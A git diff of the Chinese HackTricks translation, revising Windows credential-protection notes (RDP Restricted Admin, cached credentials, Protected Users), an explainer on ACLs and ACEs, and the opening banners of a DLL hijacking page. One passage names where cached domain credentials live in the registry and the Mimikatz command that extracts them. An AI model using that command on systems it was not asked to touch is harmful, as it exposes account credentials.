+有关实施自定义 SSP 进行凭据捕获的更多详细信息,请参阅 [this guide](../active-directory-methodology/custom-ssp.md)。
## RDP RestrictedAdmin 模式
-**Windows 8.1和Windows Server 2012 R2**引入了几项新的安全功能,包括_**RDP的受限管理员模式**_。该模式旨在通过减轻与\*\*[传递哈希](https://blog.ahasayen.com/pass-the-hash/)\*\*攻击相关的风险来增强安全性。
+**Windows 8.1 和 Windows Server 2012 R2** 引入了几个新的安全功能,包括 _**RDP 的 Restricted Admin 模式**_。此模式旨在通过减轻与 [**pass the hash**](https://blog.ahasayen.com/pass-the-hash/) 攻击相关的风险来增强安全性。
-传统上,通过RDP连接到远程计算机时,您的凭据会存储在目标计算机上。这会带来重大的安全风险,特别是在使用具有提升权限的帐户时。然而,引入_**受限管理员模式**_后,这种风险大大降低。
+传统上,通过 RDP 连接到远程计算机时,您的凭据会存储在目标机器上。这带来了显著的安全风险,尤其是在使用具有提升权限的帐户时。然而,随着 _**Restricted Admin 模式**_ 的引入,这一风险大大降低。
-使用命令**mstsc.exe /RestrictedAdmin**启动RDP连接时,对远程计算机的身份验证是在不将您的凭据存储在其上的情况下执行的。这种方法确保在恶意软件感染或恶意用户访问远程服务器时,您的凭据不会泄露,因为它们未存储在服务器上。
+当使用命令 **mstsc.exe /RestrictedAdmin** 启动 RDP 连接时,远程计算机的身份验证是在不存储您的凭据的情况下进行的。这种方法确保在发生恶意软件感染或恶意用户获得远程服务器访问权限的情况下,您的凭据不会被泄露,因为它们并未存储在服务器上。
-需要注意的是,在**受限管理员模式**下,从RDP会话尝试访问网络资源时不会使用您的个人凭据;而是使用**计算机的身份**。
+需要注意的是,在 **Restricted Admin 模式** 下,从 RDP 会话访问网络资源的尝试将不会使用您的个人凭据;相反,使用的是 **机器的身份**。
-这一功能在确保远程桌面连接安全性和在安全漏洞发生时保护敏感信息不被暴露方面迈出了重要的一步。
+此功能标志着在保护远程桌面连接和敏感信息免受安全漏洞暴露方面的重要进展。
-
+
-有关更详细的信息,请访问[此资源](https://blog.ahasayen.com/restricted-admin-mode-for-rdp/)。
+有关更多详细信息,请访问 [this resource](https://blog.ahasayen.com/restricted-admin-mode-for-rdp/)。
## 缓存凭据
-Windows通过**本地安全机构(LSA)来保护域凭据**,支持使用安全协议如**Kerberos**和**NTLM**的登录过程。Windows的一个关键功能是其能够缓存**最后十个域登录**,以确保用户即使**域控制器脱机**时仍然可以访问其计算机——这对经常远离公司网络的笔记本电脑用户来说是一个福音。
-
-缓存登录次数可通过特定的**注册表键或组策略**进行调整。要查看或更改此设置,使用以下命令:
+Windows 通过 **本地安全机构 (LSA)** 保护 **域凭据**,支持使用 **Kerberos** 和 **NTLM** 等安全协议的登录过程。Windows 的一个关键特性是其能够缓存 **最后十个域登录**,以确保用户即使在 **域控制器离线** 时仍能访问他们的计算机——这对经常远离公司网络的笔记本电脑用户来说是一个福音。
+缓存登录的数量可以通过特定的 **注册表项或组策略** 进行调整。要查看或更改此设置,可以使用以下命令:
```bash
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT
```
+访问这些缓存凭据的权限受到严格控制,只有 **SYSTEM** 账户拥有查看它们所需的权限。需要访问此信息的管理员必须以 SYSTEM 用户权限进行操作。凭据存储在:`HKEY_LOCAL_MACHINE\SECURITY\Cache`
-访问这些缓存凭据受到严格控制,只有 **SYSTEM** 帐户具有查看它们所需的权限。需要访问这些信息的管理员必须以 SYSTEM 用户权限进行访问。这些凭据存储在:`HKEY_LOCAL_MACHINE\SECURITY\Cache`
+**Mimikatz** 可以通过命令 `lsadump::cache` 提取这些缓存凭据。
-**Mimikatz** 可以用来提取这些缓存凭据,使用命令 `lsadump::cache`。
-
-有关更多详细信息,请参阅原始 [来源](http://juggernaut.wikidot.com/cached-credentials) 提供的全面信息。
+有关更多详细信息,原始 [source](http://juggernaut.wikidot.com/cached-credentials) 提供了全面的信息。
## 受保护用户
-加入 **受保护用户组** 会为用户引入几项安全增强功能,确保更高级别的保护,防止凭据被窃取和滥用:
+加入 **受保护用户组** 的成员为用户引入了几项安全增强措施,确保对凭据盗窃和滥用的更高保护级别:
* **凭据委派 (CredSSP)**:即使启用了 **允许委派默认凭据** 的组策略设置,受保护用户的明文凭据也不会被缓存。
-* **Windows Digest**:从 **Windows 8.1 和 Windows Server 2012 R2** 开始,系统不会缓存受保护用户的明文凭据,无论 Windows Digest 状态如何。
+* **Windows Digest**:从 **Windows 8.1 和 Windows Server 2012 R2** 开始,系统将不会缓存受保护用户的明文凭据,无论 Windows Digest 状态如何。
* **NTLM**:系统不会缓存受保护用户的明文凭据或 NT 单向函数 (NTOWF)。
-* **Kerberos**:对于受保护用户,Kerberos 认证不会生成 **DES** 或 **RC4 密钥**,也不会缓存明文凭据或长期密钥超出初始票据授予票证 (TGT) 获取。
-* **离线登录**:受保护用户在登录或解锁时不会创建缓存的验证器,这意味着不支持这些帐户的离线登录。
+* **Kerberos**:对于受保护用户,Kerberos 认证不会生成 **DES** 或 **RC4 密钥**,也不会缓存明文凭据或超出初始票证授予票 (TGT) 获取的长期密钥。
+* **离线登录**:受保护用户在登录或解锁时不会创建缓存验证器,这意味着这些账户不支持离线登录。
-这些保护措施在属于 **受保护用户组** 的用户登录设备时立即激活。这确保了关键的安全措施已经就位,以防范各种凭据泄露方法。
+这些保护措施在 **受保护用户组** 的成员登录设备时立即激活。这确保了关键安全措施到位,以防止各种凭据泄露方法。
-有关更详细信息,请参阅官方 [文档](https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group)。
+有关更详细的信息,请查阅官方 [documentation](https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group)。
-**来自** [**文档**](https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-c--protected-accounts-and-groups-in-active-directory)\*\* 的表格\*\*。
+**表格来自** [**the docs**](https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-c--protected-accounts-and-groups-in-active-directory)**.**
| Windows Server 2003 RTM | Windows Server 2003 SP1+ | Windows Server 2012,
Windows Server 2008 R2,
Windows Server 2008
| Windows Server 2016 |
| ----------------------- | ------------------------ | ----------------------------------------------------------------------------- | ---------------------------- |
-| Account Operators | Account Operators | Account Operators | Account Operators |
-| Administrator | Administrator | Administrator | Administrator |
-| Administrators | Administrators | Administrators | Administrators |
-| Backup Operators | Backup Operators | Backup Operators | Backup Operators |
-| Cert Publishers | | | |
-| Domain Admins | Domain Admins | Domain Admins | Domain Admins |
-| Domain Controllers | Domain Controllers | Domain Controllers | Domain Controllers |
-| Enterprise Admins | Enterprise Admins | Enterprise Admins | Enterprise Admins |
-| | | | Enterprise Key Admins |
-| | | | Key Admins |
+| 账户操作员 | 账户操作员 | 账户操作员 | 账户操作员 |
+| 管理员 | 管理员 | 管理员 | 管理员 |
+| 管理员们 | 管理员们 | 管理员们 | 管理员们 |
+| 备份操作员 | 备份操作员 | 备份操作员 | 备份操作员 |
+| 证书发布者 | | | |
+| 域管理员 | 域管理员 | 域管理员 | 域管理员 |
+| 域控制器 | 域控制器 | 域控制器 | 域控制器 |
+| 企业管理员 | 企业管理员 | 企业管理员 | 企业管理员 |
+| | | | 企业密钥管理员 |
+| | | | 密钥管理员 |
| Krbtgt | Krbtgt | Krbtgt | Krbtgt |
-| Print Operators | Print Operators | Print Operators | Print Operators |
-| | | Read-only Domain Controllers | Read-only Domain Controllers |
-| Replicator | Replicator | Replicator | Replicator |
-| Schema Admins | Schema Admins | Schema Admins | Schema Admins |
-| Server Operators | Server Operators | Server Operators | Server Operators |
+| 打印操作员 | 打印操作员 | 打印操作员 | 打印操作员 |
+| | | 只读域控制器 | 只读域控制器 |
+| 复制器 | 复制器 | 复制器 | 复制器 |
+| 架构管理员 | 架构管理员 | 架构管理员 | 架构管理员 |
+| 服务器操作员 | 服务器操作员 | 服务器操作员 | 服务器操作员 |
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
+
+
+Support HackTricks
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+{% endhint %}
diff --git a/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md b/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
index dca8aceb8..60cbb6e33 100644
--- a/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
+++ b/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
@@ -3,111 +3,113 @@
\
-使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=acls-dacls-sacls-aces) 来轻松构建和 **自动化工作流程**,利用世界上 **最先进** 的社区工具。\
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=acls-dacls-sacls-aces) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=acls-dacls-sacls-aces" %}
+{% hint style="success" %}
+学习和实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习和实践 GCP 黑客技术: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家)!
+支持 HackTricks
-支持 HackTricks 的其他方式:
-
-* 如果您想看到您的 **公司在 HackTricks 中做广告** 或 **下载 HackTricks 的 PDF**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
-* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
-* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
-* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来 **分享您的黑客技巧**。
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
+{% endhint %}
-## **访问控制列表(ACL)**
+## **访问控制列表 (ACL)**
-访问控制列表(ACL)由一组有序的访问控制条目(ACEs)组成,规定了对象及其属性的保护措施。实质上,ACL 定义了哪些安全主体(用户或组)对给定对象具有允许或拒绝的操作权限。
+访问控制列表 (ACL) 由一组有序的访问控制条目 (ACE) 组成,这些条目规定了对象及其属性的保护。实质上,ACL 定义了哪些安全主体(用户或组)对给定对象的哪些操作是被允许或拒绝的。
-有两种类型的 ACL:
+ACL 有两种类型:
-* **自主访问控制列表(DACL):** 指定哪些用户和组对对象具有或不具有访问权限。
-* **系统访问控制列表(SACL):** 管理对对象的访问尝试进行审计。
+* **自主访问控制列表 (DACL):** 指定哪些用户和组可以或不能访问对象。
+* **系统访问控制列表 (SACL):** 管理对对象的访问尝试的审计。
-访问文件的过程涉及系统检查对象的安全描述符与用户的访问令牌,以确定是否应授予访问权限以及基于 ACE 的访问程度。
+访问文件的过程涉及系统检查对象的安全描述符与用户的访问令牌,以确定是否应授予访问权限以及访问的范围,基于 ACE。
### **关键组件**
-* **DACL:** 包含为用户和组授予或拒绝对象访问权限的 ACE。它实质上是规定访问权限的主要 ACL。
-* **SACL:** 用于审计对对象的访问,其中 ACE 定义要在安全事件日志中记录的访问类型。这对于检测未经授权的访问尝试或解决访问问题非常有价值。
+* **DACL:** 包含授予或拒绝用户和组对对象的访问权限的 ACE。它本质上是主要的 ACL,决定访问权限。
+* **SACL:** 用于审计对对象的访问,其中 ACE 定义了在安全事件日志中记录的访问类型。这对于检测未经授权的访问尝试或排除访问问题非常有价值。
### **系统与 ACL 的交互**
-每个用户会话都与包含与该会话相关的安全信息的访问令牌相关联,包括用户、组标识和特权。此令牌还包括一个登录 SID,用于唯一标识会话。
+每个用户会话都与一个访问令牌相关联,该令牌包含与该会话相关的安全信息,包括用户、组身份和特权。该令牌还包括一个唯一标识会话的登录 SID。
-本地安全性机构(LSASS)通过检查 DACL 中与尝试访问的安全主体匹配的 ACE 来处理对对象的访问请求。如果未找到相关 ACE,则立即授予访问权限。否则,LSASS 将 ACE 与访问令牌中的安全主体 SID 进行比较,以确定访问资格。
+本地安全机构 (LSASS) 通过检查 DACL 中与尝试访问的安全主体匹配的 ACE 来处理对对象的访问请求。如果未找到相关的 ACE,则立即授予访问权限。否则,LSASS 将 ACE 与访问令牌中的安全主体 SID 进行比较,以确定访问资格。
-### **总结的过程**
+### **总结过程**
-* **ACL:** 通过 DACL 定义访问权限,通过 SACL 定义审计规则。
+* **ACLs:** 通过 DACL 定义访问权限,通过 SACL 定义审计规则。
* **访问令牌:** 包含会话的用户、组和特权信息。
-* **访问决策:** 通过将 DACL ACE 与访问令牌进行比较来做出决策;SACL 用于审计。
+* **访问决策:** 通过将 DACL ACE 与访问令牌进行比较来做出;SACL 用于审计。
### ACEs
-有 **三种主要类型的访问控制条目(ACEs)**:
+有 **三种主要类型的访问控制条目 (ACE)**:
-* **拒绝访问 ACE:** 此 ACE 明确拒绝指定用户或组对对象的访问(在 DACL 中)。
-* **允许访问 ACE:** 此 ACE 明确授予指定用户或组对对象的访问权限(在 DACL 中)。
-* **系统审计 ACE:** 位于系统访问控制列表(SACL)中,负责在用户或组尝试访问对象时生成审计日志。它记录访问是否被允许或拒绝以及访问的性质。
+* **拒绝访问 ACE:** 此 ACE 明确拒绝指定用户或组(在 DACL 中)对对象的访问。
+* **允许访问 ACE:** 此 ACE 明确授予指定用户或组(在 DACL 中)对对象的访问。
+* **系统审计 ACE:** 位于系统访问控制列表 (SACL) 中,此 ACE 负责在用户或组尝试访问对象时生成审计日志。它记录访问是被允许还是被拒绝以及访问的性质。
-每个 ACE 都有 **四个关键组件**:
+每个 ACE 具有 **四个关键组件**:
-1. 用户或组的 **安全标识符(SID)**(或在图形表示中的主体名称)。
-2. 一个标识 ACE 类型的 **标志**(拒绝访问、允许访问或系统审计)。
-3. 决定子对象是否可以从其父对象继承 ACE 的 **继承标志**。
-4. 一个 [**访问掩码**](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-dtyp/7a53f60e-e730-4dfe-bbe9-b21b62eb790b?redirectedfrom=MSDN),指定对象授予的权限。
+1. 用户或组的 **安全标识符 (SID)**(或其在图形表示中的主体名称)。
+2. 一个 **标志**,标识 ACE 类型(拒绝访问、允许访问或系统审计)。
+3. **继承标志**,确定子对象是否可以从其父对象继承 ACE。
+4. 一个 [**访问掩码**](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/7a53f60e-e730-4dfe-bbe9-b21b62eb790b?redirectedfrom=MSDN),一个 32 位值,指定对象的授予权限。
-访问决策是通过顺序检查每个 ACE 进行的,直到:
+访问确定是通过依次检查每个 ACE 进行的,直到:
-* **拒绝访问 ACE** 明确拒绝访问令牌中的受托人请求的权限。
-* **允许访问 ACE** 明确向访问令牌中的受托人授予所有请求的权限。
-* 在检查所有 ACE 后,如果任何请求的权限 **未被明确允许**,则将隐式 **拒绝** 访问。
+* 一个 **拒绝访问 ACE** 明确拒绝访问令牌中标识的受托人的请求权限。
+* **允许访问 ACE** 明确授予访问令牌中受托人的所有请求权限。
+* 检查所有 ACE 后,如果任何请求的权限 **未被明确允许**,则访问被隐式 **拒绝**。
-### ACE 的顺序
+### ACEs 的顺序
-将 **ACEs**(规定谁可以访问或不能访问某物的规则)放在称为 **DACL** 的列表中的方式非常重要。这是因为一旦系统基于这些规则给予或拒绝访问权限,它就不再查看其余部分。
+**ACEs**(规则,说明谁可以或不能访问某物)在称为 **DACL** 的列表中的排列方式非常重要。这是因为一旦系统根据这些规则授予或拒绝访问,它就会停止查看其余的规则。
-有一种最佳组织这些 ACE 的方法,称为 **“规范顺序”**。这种方法有助于确保一切运行顺畅和公平。对于像 **Windows 2000** 和 **Windows Server 2003** 这样的系统,操作如下:
+有一种最佳的组织这些 ACE 的方法,称为 **“规范顺序。”** 这种方法有助于确保一切顺利和公平。对于像 **Windows 2000** 和 **Windows Server 2003** 这样的系统,其顺序如下:
-* 首先,将所有专门为此项制定的规则放在其他规则之前,例如来自父文件夹等其他地方的规则。
-* 在这些特定规则中,将说 **“不”(拒绝)** 的规则放在说 **“是”(允许)** 的规则之前。
-* 对于来自其他地方的规则,从 **最近的来源** 开始,然后再往回走。同样,将 **“不”** 放在 **“是”** 之前。
+* 首先,将所有 **专门为此项** 制定的规则放在来自其他地方(如父文件夹)的规则之前。
+* 在这些特定规则中,将 **“否”(拒绝)** 的规则放在 **“是”(允许)** 的规则之前。
+* 对于来自其他地方的规则,从 **最近的来源** 开始,例如父级,然后向后推。再次,将 **“否”** 放在 **“是”** 之前。
-这种设置有两个重要作用:
+这种设置在两个方面有很大帮助:
-* 确保如果有一个特定的 **“不”**,它将被尊重,无论其他 **“是”** 规则如何。
-* 在任何来自父文件夹或更远处的规则生效之前,让项目的所有者有最终决定权,确保谁可以进入。
+* 它确保如果有特定的 **“否”**,无论其他 **“是”** 规则是什么,都得到尊重。
+* 它让项目的所有者在任何来自父文件夹或更远的规则生效之前,拥有 **最终决定权**。
-通过这种方式,文件或文件夹的所有者可以非常精确地确定谁可以访问,确保正确的人可以进入,错误的人则不能。
+通过这种方式,文件或文件夹的所有者可以非常精确地控制谁可以访问,确保正确的人可以进入,而错误的人不能。
-因此,这种 **“规范顺序”** 主要是为了确保访问规则清晰且运行良好,首先放置特定规则并以智能方式组织一切。
+因此,这种 **“规范顺序”** 旨在确保访问规则清晰且有效,优先考虑特定规则,并以智能的方式组织一切。
\
-使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 来轻松构建和 **自动化工作流程**,利用世界上 **最先进** 的社区工具。\
+使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-### GUI示例
-[**这里的示例**](https://secureidentity.se/acl-dacl-sacl-and-the-ace/)
+### GUI 示例
-这是一个文件夹的经典安全选项卡,显示了ACL、DACL和ACE:
+[**来自这里的示例**](https://secureidentity.se/acl-dacl-sacl-and-the-ace/)
+
+这是一个文件夹的经典安全选项卡,显示了 ACL、DACL 和 ACEs:
-如果我们点击**高级按钮**,将会看到更多选项,比如继承:
+如果我们点击 **高级按钮**,我们将获得更多选项,如继承:
@@ -115,63 +117,86 @@
-最后,我们在审核选项卡中有SACL:
+最后,我们在审计选项卡中有 SACL:
-### 以简化方式解释访问控制
+### 以简化的方式解释访问控制
-在管理资源(如文件夹)的访问时,我们使用称为访问控制列表(ACLs)和访问控制条目(ACEs)的列表和规则。这些规则定义了谁可以或不能访问某些数据。
+在管理对资源的访问时,例如文件夹,我们使用称为访问控制列表 (ACL) 和访问控制条目 (ACE) 的列表和规则。这些定义了谁可以或不能访问某些数据。
#### 拒绝特定组的访问
-想象一下您有一个名为Cost的文件夹,您希望所有人都可以访问它,除了市场团队。通过正确设置规则,我们可以确保在允许其他人访问之前,明确拒绝市场团队的访问。这是通过在允许所有人访问的规则之前放置拒绝市场团队访问的规则来实现的。
+想象一下,您有一个名为 Cost 的文件夹,您希望每个人都可以访问,除了市场团队。通过正确设置规则,我们可以确保市场团队被明确拒绝访问,然后再允许其他所有人。这是通过将拒绝市场团队访问的规则放在允许所有人访问的规则之前来实现的。
-#### 允许拒绝组的特定成员访问
+#### 允许被拒绝组的特定成员访问
-假设市场总监Bob需要访问Cost文件夹,尽管通常市场团队不应该访问。我们可以为Bob添加一个特定规则(ACE),授予他访问权限,并将其放置在拒绝市场团队访问的规则之前。这样,尽管对他的团队有一般限制,Bob仍然可以访问。
+假设市场总监 Bob 需要访问 Cost 文件夹,尽管市场团队通常不应该有访问权限。我们可以为 Bob 添加一个特定的规则 (ACE),授予他访问权限,并将其放在拒绝市场团队访问的规则之前。这样,尽管对他的团队有一般限制,Bob 仍然可以访问。
#### 理解访问控制条目
-ACE是ACL中的个别规则。它们标识用户或组,指定允许或拒绝的访问权限,并确定这些规则如何应用于子项(继承)。有两种主要类型的ACE:
+ACE 是 ACL 中的单个规则。它们识别用户或组,指定允许或拒绝的访问,并确定这些规则如何适用于子项(继承)。ACE 主要有两种类型:
-- **通用ACE**:这些广泛适用,影响所有类型的对象或仅区分容器(如文件夹)和非容器(如文件)。例如,允许用户查看文件夹内容但不允许访问其中文件的规则。
-- **特定对象ACE**:这些提供更精确的控制,允许为特定类型的对象或甚至对象内的个别属性设置规则。例如,在用户目录中,规则可能允许用户更新其电话号码但不允许更改登录时间。
+* **通用 ACE:** 这些规则广泛适用,影响所有类型的对象,或仅区分容器(如文件夹)和非容器(如文件)。例如,允许用户查看文件夹内容但不访问其中文件的规则。
+* **对象特定 ACE:** 这些提供更精确的控制,允许为特定类型的对象或对象内的单个属性设置规则。例如,在用户目录中,规则可能允许用户更新他们的电话号码,但不允许更新他们的登录时间。
-每个ACE包含重要信息,如规则适用于谁(使用安全标识符或SID)、规则允许或拒绝什么(使用访问掩码)以及如何被其他对象继承。
+每个 ACE 包含重要信息,例如规则适用的对象(使用安全标识符或 SID)、规则允许或拒绝的内容(使用访问掩码)以及如何被其他对象继承。
-#### ACE类型之间的关键区别
+#### ACE 类型之间的关键区别
-- **通用ACE**适用于简单的访问控制场景,其中相同规则适用于对象的所有方面或容器内的所有对象。
-- **特定对象ACE**用于更复杂的场景,特别是在像Active Directory这样的环境中,您可能需要以不同方式控制对对象特定属性的访问。
+* **通用 ACE** 适用于简单的访问控制场景,其中相同的规则适用于对象的所有方面或容器内的所有对象。
+* **对象特定 ACE** 用于更复杂的场景,特别是在 Active Directory 等环境中,您可能需要以不同的方式控制对对象特定属性的访问。
-总之,ACL和ACE有助于定义精确的访问控制,确保只有正确的个人或组可以访问敏感信息或资源,并能够将访问权限调整到个别属性或对象类型的级别。
+总之,ACL 和 ACE 有助于定义精确的访问控制,确保只有正确的个人或组可以访问敏感信息或资源,并能够将访问权限细化到单个属性或对象类型的级别。
### 访问控制条目布局
-| ACE字段 | 描述 |
+| ACE 字段 | 描述 |
| ----------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
-| 类型 | 指示ACE类型的标志。Windows 2000和Windows Server 2003支持六种ACE类型:附加到所有可保护对象的三种通用ACE类型。可能出现在Active Directory对象中的三种特定对象ACE类型。 |
-| 标志 | 控制继承和审核的一组位标志。 |
-| 大小 | 为ACE分配的内存字节数。 |
-| 访问掩码 | 32位值,其位对应于对象的访问权限。位可以设置为开或关,但设置的含义取决于ACE类型。例如,如果对应于读取权限的位被打开,并且ACE类型为拒绝,则ACE拒绝读取对象权限。如果相同位被设置为开,但ACE类型为允许,则ACE授予读取对象权限。访问掩码的更多细节见下表。 |
-| SID | 标识由此ACE控制或监视其访问的用户或组。 |
+| 类型 | 表示 ACE 类型的标志。Windows 2000 和 Windows Server 2003 支持六种类型的 ACE:三种通用 ACE 类型,附加到所有可安全对象。三种对象特定 ACE 类型,可以出现在 Active Directory 对象中。 |
+| 标志 | 控制继承和审计的一组位标志。 |
+| 大小 | 为 ACE 分配的内存字节数。 |
+| 访问掩码 | 32 位值,其位对应于对象的访问权限。位可以设置为开启或关闭,但设置的含义取决于 ACE 类型。例如,如果对应于读取权限的位被打开,并且 ACE 类型为拒绝,则 ACE 拒绝读取对象的权限。如果同一位被设置为开启,但 ACE 类型为允许,则 ACE 授予读取对象权限的权利。访问掩码的更多细节出现在下一个表中。 |
+| SID | 标识由此 ACE 控制或监控访问的用户或组。 |
### 访问掩码布局
-| 位(范围) | 含义 | 描述/示例 |
+| 位(范围) | 意义 | 描述/示例 |
| ----------- | ---------------------------------- | ----------------------------------------- |
-| 0 - 15 | 特定对象访问权限 | 读取数据,执行,追加数据 |
-| 16 - 22 | 标准访问权限 | 删除,写ACL,写所有者 |
-| 23 | 可访问安全ACL | |
+| 0 - 15 | 对象特定访问权限 | 读取数据、执行、附加数据 |
+| 16 - 22 | 标准访问权限 | 删除、写入 ACL、写入所有者 |
+| 23 | 可以访问安全 ACL | |
| 24 - 27 | 保留 | |
-| 28 | 通用ALL(读取,写入,执行) | 以下所有内容 |
+| 28 | 通用所有(读取、写入、执行) | 下面的所有内容 |
| 29 | 通用执行 | 执行程序所需的所有内容 |
-| 30 | 通用写 | 写入文件所需的所有内容 |
-| 31 | 通用读 | 读取文件所需的所有内容 |
+| 30 | 通用写入 | 写入文件所需的所有内容 |
+| 31 | 通用读取 | 读取文件所需的所有内容 |
-## 参考资料
+## 参考文献
* [https://www.ntfs.com/ntfs-permissions-acl-use.htm](https://www.ntfs.com/ntfs-permissions-acl-use.htm)
* [https://secureidentity.se/acl-dacl-sacl-and-the-ace/](https://secureidentity.se/acl-dacl-sacl-and-the-ace/)
-* [https://www.coopware.in2.info/\_ntfsacl\_ht.htm](https://www.coopware.in2.info/\_ntfsacl\_ht.htm)
+* [https://www.coopware.in2.info/_ntfsacl_ht.htm](https://www.coopware.in2.info/_ntfsacl_ht.htm)
+
+{% hint style="success" %}
+学习和实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习和实践 GCP 黑客技术: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
+
+
+支持 HackTricks
+
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
+
+
+{% endhint %}
+
+
+
+\
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=acls-dacls-sacls-aces) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限:
+
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=acls-dacls-sacls-aces" %}
diff --git a/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md b/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md
index 81e1dfe0a..8a8d3fcf4 100644
--- a/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md
+++ b/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md
@@ -1,114 +1,116 @@
-# DLL劫持
+# Dll Hijacking
+
+{% hint style="success" %}
+学习和实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习和实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)!
+支持 HackTricks
-支持HackTricks的其他方式:
-
-* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
-* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
-* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
-* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
